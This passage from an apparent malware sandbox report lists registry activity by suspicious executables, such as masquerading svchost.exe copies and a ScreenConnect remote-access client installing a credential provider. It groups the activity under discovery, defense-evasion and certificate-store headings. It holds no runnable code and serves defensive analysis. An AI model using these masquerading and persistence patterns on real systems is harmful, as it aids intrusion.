Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\36.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\access.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\system.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
